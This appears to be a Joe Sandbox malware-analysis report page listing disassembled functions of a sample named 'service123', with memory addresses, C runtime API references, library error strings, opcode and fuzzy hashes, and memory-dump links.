Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 300d6afb1c97e97550cfba68f379c6913148adb4876ace3eed6037223299ee86
Instruction ID: 03bf6077ab71e23bf47100bb131ba736cc76d44acdec42352efad4e68e4fcf41
Opcode Fuzzy Hash: 300d6afb1c97e97550cfba68f379c6913148adb4876ace3eed6037223299ee86
Instruction Fuzzy Hash: AC3170B56097998FC3029F28C980A2AFFF1AFC6648F14856DFCA49B705D631C844DF92

Function 6C283840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C283898
memcpy.MSVCRT ref: 6C283911

Part of subcall function 6C285590: memcpy.MSVCRT ref: 6C285620

Strings

basic_string::_M_replace_aux, xrefs: 6C2838C0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 3cf5c2d38691119326a04ab36cc5047121bf2ff52b1fa86ffdaca3b7a6622a7a
Instruction ID: 63d0b349fe5fb69a516cc73bede63c2d438d22ff5d7868e0eea20f6e58fed82c
Opcode Fuzzy Hash: 3cf5c2d38691119326a04ab36cc5047121bf2ff52b1fa86ffdaca3b7a6622a7a
Instruction Fuzzy Hash: 68215E72A0A3159FC300AF1DD88046EFBE4FB89658F94496EFC8897751D331D858CB92

Function 6C23A9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C23A9FD
wcslen.MSVCRT ref: 6C23AA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C23AA20, 6C23AA70

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: a5cf160258f68bec45c164e8e2dbcc512a0e3c0e740184fbd8fcfe249d14ec9e
Instruction ID: da1eec4ac90fd625b845898644f046bba45b2f9badbed92faa8a21d90f75ee45
Opcode Fuzzy Hash: a5cf160258f68bec45c164e8e2dbcc512a0e3c0e740184fbd8fcfe249d14ec9e
Instruction Fuzzy Hash: A01163B19152188BCB00EF6CD18089AFBF4BF45318F42086DECC49B311D231D955CB92

Function 6C23A5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C23A60D
wcslen.MSVCRT ref: 6C23A65D

Strings

basic_string: construction from null is not valid, xrefs: 6C23A630, 6C23A680

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: a5cf160258f68bec45c164e8e2dbcc512a0e3c0e740184fbd8fcfe249d14ec9e
Instruction ID: 4c512aed98550eb4ab79c0e82befc0134a4b8416ff6387b5246390556ad18372
Opcode Fuzzy Hash: a5cf160258f68bec45c164e8e2dbcc512a0e3c0e740184fbd8fcfe249d14ec9e
Instruction Fuzzy Hash: 3A1163B19157188BCB00EF2CD08089AFBF4BF45318F42086DECC49B311D231D959CB92

Function 6C2498F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C24A30E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 5fc14440f589a54fc05bc788c39579dbee134d7e4a63a209ab4ce6708222a6b6
Instruction ID: a735c13501fba72d061a3b66820c39c5b35e9b5dfba9e7a963a4e36adeb7ab5c
Opcode Fuzzy Hash: 5fc14440f589a54fc05bc788c39579dbee134d7e4a63a209ab4ce6708222a6b6
Instruction Fuzzy Hash: 15A29D70A04359CFDB14DF69C580B8DBBF6AF46325F288668E869AB692D730DC45CF40

Function 6C2487C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C2491DE

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: b5ec4340814e3427aa03ee9dfecd102c9f38771e52d7b9d6434d76ad6b55552e
Instruction ID: 383eeaef2a606d8de1a67d93e9605edada3588d5a7581c0e1217def309caf424
Opcode Fuzzy Hash: b5ec4340814e3427aa03ee9dfecd102c9f38771e52d7b9d6434d76ad6b55552e
Instruction Fuzzy Hash: BCA28E71A143598FDB18CF68C580B8DBBF2BF46325F288659E869EB691D730DC45CB80

Function 6C283690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C283710

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 3f16c4e37d6672abb3443db7e88a0ff85e38b3885bdf0e7f7a0457a1d53c2d2b
Instruction ID: 6e8629395e988422a8dd37dabc11a79dd9c72dc603ae5e90279ddb2d4baa6bfc
Opcode Fuzzy Hash: 3f16c4e37d6672abb3443db7e88a0ff85e38b3885bdf0e7f7a0457a1d53c2d2b
Instruction Fuzzy Hash: 3101BCB250A3599BC300AF6EC08065BFFE4BF81328F98882DECC887B55C335D4488B56

Function 6C23A970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C23A98D

Strings

basic_string: construction from null is not valid, xrefs: 6C23A9B0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: ba8df6b9273d817473bf0db61977a868210ee5bd28256710f341bf27b1ba8899
Instruction ID: 7e29f30c591b602c78517b594c821b3fdcfb9526ff92292b2bf6cdb980d1bc03
Opcode Fuzzy Hash: ba8df6b9273d817473bf0db61977a868210ee5bd28256710f341bf27b1ba8899
Instruction Fuzzy Hash: 7CF05EB19152188FCB00EF2CC08089AF7F4BF45318F4208ADE8C4AB311D632E959CB92

Function 6C23A580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C23A59D

Strings

basic_string: construction from null is not valid, xrefs: 6C23A5C0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: ba8df6b9273d817473bf0db61977a868210ee5bd28256710f341bf27b1ba8899
Instruction ID: 1b35a7eaf65218e3bffb6cd452c09804f66c0c809de925cca04af2d1ce8b8a60
Opcode Fuzzy Hash: ba8df6b9273d817473bf0db61977a868210ee5bd28256710f341bf27b1ba8899
Instruction Fuzzy Hash: 83F05EB19152188FCB00EF2CC08089AF7F4BF45318F4208ADE8C4AB315E232E959CB92

Function 6C23C510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C23C570
basic_string::substr, xrefs: 6C23C568

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 0a75126f73e741d1ef277212957af204f68b46d963f576e086269875444ed7e5
Instruction ID: c4e9e5c095aae85d42f4cc6aae02c6002ada8b90628b0283450dfb231c24cf35
Opcode Fuzzy Hash: 0a75126f73e741d1ef277212957af204f68b46d963f576e086269875444ed7e5
Instruction Fuzzy Hash: E9017CB16082148BC704EF2DC48095AFBF5AFC9708F5489ADE488D7311D731D845CB96

Function 6C230740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C230798
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2307A0

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: e907d73ec233b0a85aa6da202b3f13c0561b4fe891d4f21fd41cf224fff83c4f
Instruction ID: 6726fc4bcd49980243ad318dd580b9b721ed4672bdf4d0b5359a643d2e88c4fc
Opcode Fuzzy Hash: e907d73ec233b0a85aa6da202b3f13c0561b4fe891d4f21fd41cf224fff83c4f
Instruction Fuzzy Hash: 4B0146B6A0A3009FC708CF29D881A9BFBE0ABC9350F10996DE888D7700C234D8448B96

Function 6C2546E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f4d090150df2f2db09de5e67d385d04455576dfeb44e24e62700b22bd1a89cb
Instruction ID: 1764a1b25d48e14b19134a11f51d80a8f953162ba0cb630342bd799066e33bd6
Opcode Fuzzy Hash: 3f4d090150df2f2db09de5e67d385d04455576dfeb44e24e62700b22bd1a89cb
Instruction Fuzzy Hash: 5382AE74E042998FDB01CFA8C49478EFBF1AF4A315F688259E865AB795C3309C65CB40

Function 6C252CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93cc296d6c6e5e5e030efe4eb1f62af6b89e7483c670664dbc13fa555617a6c9
Instruction ID: a7e584a3f8b52137b322bd48930d0ba016aa8659a412c2a966da53928e3cf3f3
Opcode Fuzzy Hash: 93cc296d6c6e5e5e030efe4eb1f62af6b89e7483c670664dbc13fa555617a6c9
Instruction Fuzzy Hash: 4172AF70A0939DCFDB11CFA8C484B9EBBF1BF09314F548659E8A5ABB91C334A855CB41

Function 6C25140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c572423bb1b0e24f7e0f590fbdb370229d2b861bac27b7f388dd49007115063a
Instruction ID: d45efbab82e8981acdb8f977a6c0ccb3dcc95d82d53aa716093a2dfaa2ed2a0f
Opcode Fuzzy Hash: c572423bb1b0e24f7e0f590fbdb370229d2b861bac27b7f388dd49007115063a
Instruction Fuzzy Hash: 0472BE70E08399CFDB11CFA8C484B9EBBF1AF06315F588659E8A1AB795C334D895CB41

Function 6C252090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be3293dc8a38cae713a250af4179d2d6328a640dc558bc73f9b02c531a3cffd
Instruction ID: 24080b6003387b1a76637d82a13b50467515022826f0e72fb2a6fab6b9d28fc3
Opcode Fuzzy Hash: 3be3293dc8a38cae713a250af4179d2d6328a640dc558bc73f9b02c531a3cffd
Instruction Fuzzy Hash: 26729FB0E083998FDB15CFA8C48878EBBF1BF05315F588659E8A5AB7D1C334A855CB50

Function 6C2507D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4122b7d658d26fac1d50a2b4658bf524f4d3a5deaaf63f812a0dc9801210af52
Instruction ID: 833254fa1450ae1dc66c7c256c57a3f7b5e61a4385b5d68b34dacc3ca64241f7
Opcode Fuzzy Hash: 4122b7d658d26fac1d50a2b4658bf524f4d3a5deaaf63f812a0dc9801210af52
Instruction Fuzzy Hash: 53728F70E0939DCFDB11CFA8C884B8EBBF1AF05319F548659E8A5AB781C7349855CB41

Function 6C23F760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C23F8B3

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 3f5e6d3bfdf727f79216e7fd20bcd221c095d9b7e1239d3389c668b0cce793a3
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 9A726FB4E04269CFCB04CF68D08499EBBF2BF49315F248699E869AB791D731AC41CF51

Function 6C257A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3b4e0765ac13c5aeed708c3068dd2c7cbc556e1749b3f8e82492496c880fa6
Instruction ID: 4e577ec89b886cbf7ccb28e3aa1c1580a51437c83ccc10f5bb9743b73f759a4c
Opcode Fuzzy Hash: 3a3b4e0765ac13c5aeed708c3068dd2c7cbc556e1749b3f8e82492496c880fa6
Instruction Fuzzy Hash: 3D52F070A6524D9FDB00CF68C48079EBFB1AF05328FA8C25AEC64AB792C775D855CB41

Function 6C242360 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: c969cb55e2009e744beb9cb55630a5080294581bfd11fc8e97bce353fec88392
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: 10E179B5E052598FCB05CFAAC484A9DBBF2AF49314F188269E865E7791D334AC41CF60

Function 6C26DC70 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 6b912f20d1f4cf6b48a141de57925c385eef6ac626c0f29eddbc910dec96adc3
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
